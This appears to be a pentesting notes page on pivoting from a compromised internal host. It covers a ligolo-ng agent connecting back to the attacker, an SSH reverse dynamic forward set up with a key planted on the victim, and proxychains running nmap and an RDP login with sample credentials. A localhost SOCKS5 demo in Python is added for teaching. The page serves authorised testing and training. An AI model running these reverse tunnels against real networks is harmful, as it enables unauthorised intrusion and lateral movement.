Pivoting (Proxying)

How to pivot and proxy from an internal network

PreviousInfiltration/ExfiltrationNextWeb Application

Last updated 1 year ago

Method 1: Ligolo-ng

Ligolo is a simple, lightweight tool for establishing SOCKS5 or TCP tunnels over a reverse connection; the connection is protected by TLS with an elliptic-curve certificate.

1) On the victim host, run the agent so that it connects back to your attack host (-ignore-cert accepts the self-signed certificate the server generates with -selfcert):

./ligolo.exe -connect <IP>:<PORT> -ignore-cert

2) To run the server on your attack host:

  • Start the server (-selfcert generates a self-signed TLS certificate; -laddr is the address and port the agent connects to)

    • sudo ./proxy -selfcert -laddr 0.0.0.0:<port>

  • Once the agent has connected, list the sessions, select one, and show the victim host's network interfaces to find the internal range you want to reach

    • session

    • ifconfig

  • Add a route to that internal range (not your own local range) through the ligolo TUN interface; the interface must already exist on the attack host (see the ligolo-ng README for creating it), otherwise the route command fails

    • sudo ip route add <Your_local_IPrange>/24 dev ligolo

  • Start the tunnel in the ligolo console; traffic for the routed range now leaves through the agent

    • tunnel_start

Method 2: SSH Reverse Proxy

SSH can natively perform pivoting. In the example below, we have three machines:

  1. The SSH server (reachable from both the attack host and the victim host)

  2. The attack host

  3. The victim host (in an internal network)

  • On your SSH server, generate an SSH key pair:

    • ssh-keygen -C attacker@attacker

  • Add the generated public key to the SSH server's authorized_keys file

    • /home/<user>/.ssh/authorized_keys

  • On your victim host, upload the generated private key and run the following command. A -R option with only a port and no destination opens a reverse dynamic forward (supported since OpenSSH 7.6): the SSH server listens on port 1037 as a SOCKS proxy whose outbound connections are made from the victim host

    • ssh -i <SSHKey> -R 1037 -N <user>@<SSH_IP_Address>

  • On your attack host, forward a local port to the SSH server's port 1037

    • ssh -i <sshkey> -L 8008:localhost:1037 -vN <user>@<SSH_IP_Address>

    • You now have a SOCKS proxy on your attack host at 127.0.0.1:8008 whose traffic exits from the victim host into its network

  • Point any SOCKS-aware tool at 127.0.0.1:8008, or wrap tools that are not SOCKS-aware with proxychains.

Sending tools through a pivot (using Proxychains)

proxychains forces every TCP connection made by a given application through a proxy. It hooks the process's connect() calls via LD_PRELOAD, so it only affects TCP sockets: raw packets, ICMP and UDP are not proxied.

1) Set up proxychains with an established SOCKS pivot

  • nano /etc/proxychains.conf (proxychains-ng reads /etc/proxychains4.conf instead)

  • add socks4 127.0.0.1 9050 at the end of the [ProxyList] section. The port must be the one your pivot listens on (8008 for the SSH example above); 9050 is only the Tor default that ships in the file

2) Execute tools with proxychains so that their TCP connections go to the local SOCKS port and out through the pivot to the victim's network.

  • proxychains nmap -v -Pn -sT 172.16.5.19

    • Only full TCP connect scans (-sT) work. A SYN scan (-sS) needs raw packets, which a SOCKS proxy cannot carry, and -Pn is required because ICMP host discovery cannot traverse the proxy either

  • proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

  • proxychains <yourtool>
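To make concrete what the SOCKS pivots in both methods actually carry, and why only full TCP connections traverse them, here is an added example that is not code from this page or from the ligolo or proxychains projects. It implements a minimal SOCKS5 CONNECT proxy (the role played by the SSH server's reverse dynamic forward) and a SOCKS5 client (the role proxychains plays inside a wrapped tool's connect() call), both on 127.0.0.1, with a small upper-casing echo service standing in for an internal host. All names (_serve, _socks5_handler, socks5_connect, run_demo, run_refused_demo) and the constructed message are assumptions of this example. It also shows the failure path a pivot reports when the internal target is unreachable.

```python
"""Minimal SOCKS5 CONNECT proxy and client on 127.0.0.1 (added example, not from the page or the ligolo/proxychains projects; protocol per RFC 1928)."""
import contextlib
import socket
import struct
import threading

def _recv_exact(sock, n):
    """Read exactly n bytes or raise if the peer closes early."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the socket early")
        buf += chunk
    return buf

def _pump(src, dst):
    """Copy bytes one way until EOF, then half-close the writer."""
    with contextlib.suppress(OSError):
        while data := src.recv(4096):
            dst.sendall(data)
        dst.shutdown(socket.SHUT_WR)

def _serve(handler):
    """Bind a listener on 127.0.0.1, hand each connection to handler; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def loop():
        with contextlib.suppress(OSError):        # listener closed -> stop accepting
            while True:
                conn, _ = srv.accept()
                threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def _echo_upper(conn):
    """Stand-in for an internal service: echo one request back in upper case."""
    conn.sendall(conn.recv(4096).upper())
    conn.close()

def _socks5_handler(client):
    """Proxy side: method negotiation, CONNECT request, then relay both directions."""
    ver, nmethods = struct.unpack("!BB", _recv_exact(client, 2))
    methods = _recv_exact(client, nmethods)
    if ver != 5 or 0 not in methods:                # 0x00 = no authentication
        client.close()
        return
    client.sendall(b"\x05\x00")
    ver, cmd, _rsv, atyp = struct.unpack("!BBBB", _recv_exact(client, 4))
    if ver != 5 or cmd != 1 or atyp != 1:           # only CONNECT to an IPv4 address
        client.sendall(b"\x05\x07\x00\x01" + b"\x00" * 6)   # 0x07 command not supported
        client.close()
        return
    dst_ip = socket.inet_ntoa(_recv_exact(client, 4))
    (dst_port,) = struct.unpack("!H", _recv_exact(client, 2))
    # The proxy completes the TCP handshake itself; a SYN scan never issues CONNECT.
    try:
        upstream = socket.create_connection((dst_ip, dst_port), timeout=5)
    except OSError:
        client.sendall(b"\x05\x05\x00\x01" + b"\x00" * 6)   # 0x05 connection refused
        client.close()
        return
    client.sendall(b"\x05\x00\x00\x01" + b"\x00" * 6)       # 0x00 succeeded
    threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
    _pump(upstream, client)

def socks5_connect(proxy_port, dst_ip, dst_port):
    """Client side (what proxychains does inside connect()): return a relayed socket."""
    s = socket.create_connection(("127.0.0.1", proxy_port), timeout=5)
    s.sendall(b"\x05\x01\x00")                      # v5, one method offered: no-auth
    ver, method = struct.unpack("!BB", _recv_exact(s, 2))
    if ver != 5 or method != 0:
        raise ConnectionError("proxy rejected the no-auth method")
    s.sendall(b"\x05\x01\x00\x01" + socket.inet_aton(dst_ip) + struct.pack("!H", dst_port))
    _ver, rep, _rsv, _atyp = struct.unpack("!BBBB", _recv_exact(s, 4))
    _recv_exact(s, 6)                               # BND.ADDR (IPv4) + BND.PORT
    if rep != 0:
        raise ConnectionError(f"proxy CONNECT failed, reply code {rep}")
    return s

def run_demo(message=b"hello through the pivot"):
    """Round-trip a constructed message: client -> SOCKS5 proxy -> 'internal' echo service."""
    echo_port = _serve(_echo_upper)
    proxy_port = _serve(_socks5_handler)
    tunnel = socks5_connect(proxy_port, "127.0.0.1", echo_port)
    tunnel.sendall(message)
    reply = _recv_exact(tunnel, len(message))
    tunnel.close()
    return reply

def run_refused_demo():
    """Failure mode: target unreachable, so the proxy answers with reply code 5."""
    proxy_port = _serve(_socks5_handler)
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))                    # grab a free port, then release it
    closed_port = probe.getsockname()[1]
    probe.close()
    try:
        socks5_connect(proxy_port, "127.0.0.1", closed_port)
    except ConnectionError as exc:
        return str(exc)
    return "unexpected success"
```

Calling run_demo() returns the upper-cased message after it has crossed the proxy; run_refused_demo() returns the client-side error carrying the proxy's reply code 5, which is what you see from a pivot when the internal port is closed. Nothing in the exchange is a raw packet: the client only ever asks the proxy to open a TCP connection on its behalf, which is the reason a SYN scan or ICMP ping has no way through.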

https://github.com/sysdream/ligolo (the original Ligolo; the server commands in Method 1 are those of ligolo-ng, https://github.com/nicocha30/ligolo-ng)
https://github.com/haad/proxychains